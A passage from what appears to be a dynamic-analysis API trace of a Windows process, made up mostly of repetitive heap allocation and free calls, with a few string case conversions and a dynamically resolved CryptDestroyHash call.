hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.591] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.591] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.592] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.592] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.592] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466d90 [0256.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.595] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.596] CryptDestroyHash (hHash=0xaa5960) returned 1 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: 